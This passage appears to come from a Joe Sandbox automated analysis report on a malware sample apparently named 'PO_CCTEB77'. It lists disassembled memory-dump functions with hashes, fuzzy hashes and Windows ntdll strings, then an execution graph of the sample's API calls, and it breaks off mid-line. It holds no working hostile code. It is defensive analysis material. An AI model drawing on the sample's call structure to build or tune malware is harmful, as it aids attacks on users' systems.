                                                                            • Opcode Fuzzy Hash: 0110f3b3ce2cafa9c6426ce67675b4e06d60e79ed3f30c2b10ba96f915621da0
                                                                            • Instruction Fuzzy Hash: 4290026338140447D10071584415B061009D7E3301F55C015E2068554DC719CE566227
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802F60 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                            • Instruction ID: 66597f28e6345446d0d57b8df99dc9a257d73fe18976d94e1b3e993d84f322c3
                                                                            • Opcode Fuzzy Hash: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                            • Instruction Fuzzy Hash: 4590026325140047D10471584405706104997E3301F55C012A3158554CC6298E655226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802E80 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                            • Instruction ID: 44e1f45831643369be0a208f5fa6618d0e2aacac1155d3338f533ef6c414a947
                                                                            • Opcode Fuzzy Hash: 8abc5cc22acf3135ee78be9ece2d8f70b354a0da5c05196e227751b42a1e137e
                                                                            • Instruction Fuzzy Hash: EE90022364140507D10171584405616100E97D2341F95C022A2028555ECB258B96A232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802EA0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                            • Instruction ID: 9473edc388d21f423c3b34fd17467de8e7ca8a41dfc65576a119a59cc63aff75
                                                                            • Opcode Fuzzy Hash: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                            • Instruction Fuzzy Hash: 9E90027324140407D14071584405746100997D2301F55C011A6068554EC7598FD96766
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802EE0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                            • Instruction ID: 2891a4898c371fcee10d842eb13c6aedc117a178528c537262ab37b3e8ab8a8f
                                                                            • Opcode Fuzzy Hash: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                            • Instruction Fuzzy Hash: 4590026324180407D14075584805607100997D2302F55C011A3068555ECB298E556236
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802E30 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6321e9f3cb489ed9f51a49d0be08a9c4a94ae63f2e95ceb1d4f707fd020ae15a
                                                                            • Instruction ID: 9e5cc1fdc56a12f8d6f467f2a4d8c52c97a2700e0404852f74576a68f39be3ec
                                                                            • Opcode Fuzzy Hash: 6321e9f3cb489ed9f51a49d0be08a9c4a94ae63f2e95ceb1d4f707fd020ae15a
                                                                            • Instruction Fuzzy Hash: 1090022334140407D10271584415606100DD7D3345F95C012E2428555DC7258B57A233
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01803090 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f556f4f909889de6e9a96c7a668002717499ff222a151dfcb548567dedc9b4b6
                                                                            • Instruction ID: cd952ed95be80b5c6a94adcce133bed3bc22e060e35ef2039de8f10478d7f822
                                                                            • Opcode Fuzzy Hash: f556f4f909889de6e9a96c7a668002717499ff222a151dfcb548567dedc9b4b6
                                                                            • Instruction Fuzzy Hash: 7790022328140807D14071588415707100AD7D2701F55C011A1028554DC7168B6967B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01803010 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99ba87f10fb694eab013e42c36be145399c0b46ab918f1463854af5cd0eb0a41
                                                                            • Instruction ID: 7f438091565283a192ab61844ab7c63e24459347e6c4028ebb8c5eae3ce3e75d
                                                                            • Opcode Fuzzy Hash: 99ba87f10fb694eab013e42c36be145399c0b46ab918f1463854af5cd0eb0a41
                                                                            • Instruction Fuzzy Hash: EB90022324184447D14072584805B0F510997E3302F95C019A515A554CCA158A595722
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 018039B0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c75739a0e049b90882e6ca70299f26770293a4df614fb40dedff4b22e3d55dc2
                                                                            • Instruction ID: f320daf1f034f69a294d5a48d13ae7b8f9b976e2e1e6ee532fa4ef006fcdaf04
                                                                            • Opcode Fuzzy Hash: c75739a0e049b90882e6ca70299f26770293a4df614fb40dedff4b22e3d55dc2
                                                                            • Instruction Fuzzy Hash: BF90022328545107D150715C44056165009B7E2301F55C021A1818594DC6558A596322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01803D10 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8665a4566e347d37148f25814f026950cd67ea4cd0e87313a5a87f2e7fb98ccd
                                                                            • Instruction ID: 33d41d6e54bae89f57fd5dcebaae8033b7f8c0fd72f7f06d01c6dec628268892
                                                                            • Opcode Fuzzy Hash: 8665a4566e347d37148f25814f026950cd67ea4cd0e87313a5a87f2e7fb98ccd
                                                                            • Instruction Fuzzy Hash: 3490023324240147954072585805A4E510997E3302B95D415A1019554CCA148A655322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01803D70 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bec4ef579762c518dcd9d94d18405da2bb6b9b8feb6d1d492e83f4e1d7599ba
                                                                            • Instruction ID: 2882c7ceef923e4c749f44e8b70c94b14b948a7fbce9abca31847de6cd3c09f7
                                                                            • Opcode Fuzzy Hash: 7bec4ef579762c518dcd9d94d18405da2bb6b9b8feb6d1d492e83f4e1d7599ba
                                                                            • Instruction Fuzzy Hash: 5390023724140407D51071585805646104A97D2301F55D411A1428558DC7548AA5A222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: e237b7bb4700b88f39381344c2952f816ef7d957fde6f9a398c868b0c61f2f22
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                            • Instruction ID: eadf4d33aa506ee02ddbea93db23a1277edfbe0beddd79811e3bfa6769cd7d63
                                                                            • Opcode Fuzzy Hash: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                            • Instruction Fuzzy Hash: 2A51E3B6A0011EAFCB56DBAC8C9497EFBB9BB483407148229F5A5D7681D374DF4087E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01872410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                            • Instruction ID: 3498b9228738425217c17ddb792a1fe779a3d3dde6dc8366aedf354c158f0748
                                                                            • Opcode Fuzzy Hash: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                            • Instruction Fuzzy Hash: 4D51E5B5A00646AEDB30DF9CCCD09BFBBFAEB44304B048469F596D7641E674EB808760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01834655
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01834725
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01834742
                                                                            • Execute=1, xrefs: 01834713
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018346FC
                                                                            • ExecuteOptions, xrefs: 018346A0
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01834787
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: b92a8d21efc945468843c92df6bf2bfda77ce73145ca28fa3f9e08d4982ea521
                                                                            • Instruction ID: b098e506c71ae5832023484686eab504a543a0546e814e3143dde028d039ffaa
                                                                            • Opcode Fuzzy Hash: b92a8d21efc945468843c92df6bf2bfda77ce73145ca28fa3f9e08d4982ea521
                                                                            • Instruction Fuzzy Hash: 5A513A3160021DAAEF15ABACDC95FAAB7A8EF58304F4400DDD705E72C1EB709B418F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0180B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 4b671ffe8753e3dd68e70b32d270105e77fa2841b0fc38c0b6a6614a7ee7cd11
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: CB81BF78E0524D8FEFAA8E6CCC517BEBBB1AF45360F184659D861E72D1C7308B408B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018302BD
                                                                            • RTL: Re-Waiting, xrefs: 0183031E
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018302E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                            • Instruction ID: c747c490d9f7ef52519a5cd31034671efdac40bce8d8fdcd06837716e7074df2
                                                                            • Opcode Fuzzy Hash: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                            • Instruction Fuzzy Hash: 59E18E706087419FE725CF2CC888B2ABBE1BB88314F140A6DF5A5CB6D1D774DA45CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01837B7F
                                                                            • RTL: Re-Waiting, xrefs: 01837BAC
                                                                            • RTL: Resource at %p, xrefs: 01837B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: 64848161edede0f3b0920a12a3170c635fdf0fd5025e7d1c2c0a1177a3a8d204
                                                                            • Instruction ID: 2a6b5547382e8dd5671b6f128baf62e550ff5c0b196b2fcdb5ddf4e036526ede
                                                                            • Opcode Fuzzy Hash: 64848161edede0f3b0920a12a3170c635fdf0fd5025e7d1c2c0a1177a3a8d204
                                                                            • Instruction Fuzzy Hash: 2541EF757047029FD725DE29CC40B6BB7E5EF88720F100A1DEA5ADB780DB31EA058B92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01837294
                                                                            • RTL: Re-Waiting, xrefs: 018372C1
                                                                            • RTL: Resource at %p, xrefs: 018372A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                            • Instruction ID: ed92fbb63dfa0e1ed2f6179fa0a8805a4b7ab8e7428eeff3cb33e154d2dbd4c7
                                                                            • Opcode Fuzzy Hash: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                            • Instruction Fuzzy Hash: A7410072700206ABD721DE29CC41F6AB7A5FB94710F14061DFA56EB380DB21FA468BD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01872300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                            • Instruction ID: 35c947a2649003a344cb862fef56bce6aa2d2297e2fba8e1e628adc2669ff9cd
                                                                            • Opcode Fuzzy Hash: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                            • Instruction Fuzzy Hash: 41315072A002199FDB20DE2DDC40BEEB7F9EB54710F44455AE949E3250EB30EB448BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01807D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction ID: 5966eb2f6580f9a3246db030485abe0fc1c3c4881f6e8611d7c0b1169ad6ed5a
                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction Fuzzy Hash: 3491A371E0021E9BEBA6DF6DCC806BEBBA5AF45720F14451EE995E72C0D730AF808711
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                            • Instruction ID: 94ef4ab80c571b81d2e48de43f003d9d22f7b8394cc85481a43384fc3cd0289a
                                                                            • Opcode Fuzzy Hash: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                            • Instruction Fuzzy Hash: 3A811D72D002699BDB72CB54CC45BEEB7B5AB48714F0041DAEA19B7240E7705F84CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:3%
                                                                            Dynamic/Decrypted Code Coverage:2.3%
                                                                            Signature Coverage:2.9%
                                                                            Total number of Nodes:954
                                                                            Total number of Limit Nodes:124
                                                                            execution_graph 94386 30099c0 94389 3009ef3 94386->94389 94388 300a31e 94389->94388 94390 3026c40 94389->94390 94391 3026c66 94390->94391 94398 3013050 94391->94398 94393 3026c72 94394 3026ca0 94393->94394 94401 30234f0 94393->94401 94405 30254e0 LdrLoadDll 94394->94405 94397 3026cb1 94397->94388 94400 301305d 94398->94400 94406 3012fa0 94398->94406 94400->94393 94402 302354a 94401->94402 94404 3023557 94402->94404 94451 3011f10 94402->94451 94404->94394 94405->94397 94407 3012fb7 94406->94407 94423 3022040 LdrLoadDll 94406->94423 94413 30220a0 94407->94413 94410 3012fc3 94412 3012fd0 94410->94412 94416 3025b20 94410->94416 94412->94400 94414 30220bd 94413->94414 94424 3025400 LdrLoadDll 94413->94424 94414->94410 94418 3025b38 94416->94418 94417 3025b5c 94417->94412 94418->94417 94425 30248e0 94418->94425 94423->94407 94424->94414 94426 30248fd 94425->94426 94434 3026190 94426->94434 94428 302490e 94438 50e2c0a 94428->94438 94429 3024929 94431 3026fb0 94429->94431 94447 3025490 94431->94447 94433 3025bc7 94433->94412 94435 302619f 94434->94435 94437 3026205 94434->94437 94435->94437 94441 3020b80 94435->94441 94437->94428 94439 50e2c1f LdrInitializeThunk 94438->94439 94440 50e2c11 94438->94440 94439->94429 94440->94429 94442 3020b8e 94441->94442 94444 3020b9a 94441->94444 94442->94444 94446 3021000 LdrLoadDll 94442->94446 94444->94437 94445 3020cec 94445->94437 94446->94445 94448 30254ad 94447->94448 94449 3026190 LdrLoadDll 94448->94449 94450 30254be RtlFreeHeap 94449->94450 94450->94433 94452 3011f29 94451->94452 94469 3017140 94452->94469 94454 3011f50 94455 30121a9 94454->94455 94481 3027090 94454->94481 94455->94404 94457 3011f66 94458 3027090 2 API calls 94457->94458 94459 3011f77 94458->94459 94460 3027090 2 API calls 94459->94460 94461 3011f88 94460->94461 94484 3015770 94461->94484 94463 3011ff0 94468 301201b 94463->94468 94514 3016380 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 94463->94514 94465 3011f95 94465->94463 94513 30158f0 LdrLoadDll 94465->94513 94494 3011a10 94468->94494 94470 301716c 94469->94470 94515 30144b0 94470->94515 94472 301717e 94519 3017030 94472->94519 94475 3017199 94479 30171a4 94475->94479 94529 3025180 94475->94529 94476 30171c2 94476->94454 94477 30171b1 94477->94476 94480 3025180 2 API calls 94477->94480 94479->94454 94480->94476 94554 3025440 94481->94554 94483 30270ab 94483->94457 94485 3015786 94484->94485 94486 3015790 94484->94486 94485->94465 94487 3014400 LdrLoadDll 94486->94487 94488 3015829 94487->94488 94489 3014340 LdrLoadDll 94488->94489 94491 301583d 94489->94491 94490 3015863 94490->94465 94491->94490 94492 3014400 LdrLoadDll 94491->94492 94493 301588a 94492->94493 94493->94465 94558 3017400 94494->94558 94496 3011a2a 94506 3011ef8 94496->94506 94564 3020090 94496->94564 94499 3011c31 94572 30281c0 94499->94572 94500 3011a88 94500->94506 94567 3028090 94500->94567 94502 30101f0 4 API calls 94509 3011c5c 94502->94509 94503 3011c46 94503->94509 94578 30101f0 94503->94578 94506->94455 94507 3011d13 94507->94509 94591 30104b0 94507->94591 94509->94502 94509->94506 94511 30104b0 2 API calls 94509->94511 94594 30173a0 94509->94594 94510 30173a0 LdrLoadDll LdrInitializeThunk 94512 3011d8a 94510->94512 94511->94509 94512->94509 94512->94510 94513->94463 94514->94468 94516 30144f6 94515->94516 94533 3014340 94516->94533 94518 3014589 94518->94472 94520 301704a 94519->94520 94528 3017126 94519->94528 94538 3014400 94520->94538 94522 301708f 94543 3024930 94522->94543 94524 30170d4 94547 3024980 94524->94547 94527 3025180 2 API calls 94527->94528 94528->94475 94528->94477 94530 302519d 94529->94530 94531 3026190 LdrLoadDll 94530->94531 94532 30251ae NtClose 94531->94532 94532->94479 94534 3014364 94533->94534 94537 30243b0 LdrLoadDll 94534->94537 94536 301439e 94536->94518 94537->94536 94539 3014425 94538->94539 94540 3014340 LdrLoadDll 94539->94540 94542 3014430 94539->94542 94541 3014478 94540->94541 94541->94522 94542->94522 94544 302494d 94543->94544 94545 3026190 LdrLoadDll 94544->94545 94546 302495e 94545->94546 94546->94524 94548 302499d 94547->94548 94549 3026190 LdrLoadDll 94548->94549 94550 30249ae 94549->94550 94553 50e35c0 LdrInitializeThunk 94550->94553 94551 301711a 94551->94527 94553->94551 94555 302545a 94554->94555 94556 3026190 LdrLoadDll 94555->94556 94557 302546b RtlAllocateHeap 94556->94557 94557->94483 94559 3017408 94558->94559 94560 3020b80 LdrLoadDll 94559->94560 94561 3017427 94560->94561 94562 3017435 94561->94562 94563 301742e SetErrorMode 94561->94563 94562->94496 94563->94562 94598 3026f20 94564->94598 94566 30200b1 94566->94500 94568 30280a0 94567->94568 94569 30280a6 94567->94569 94568->94499 94570 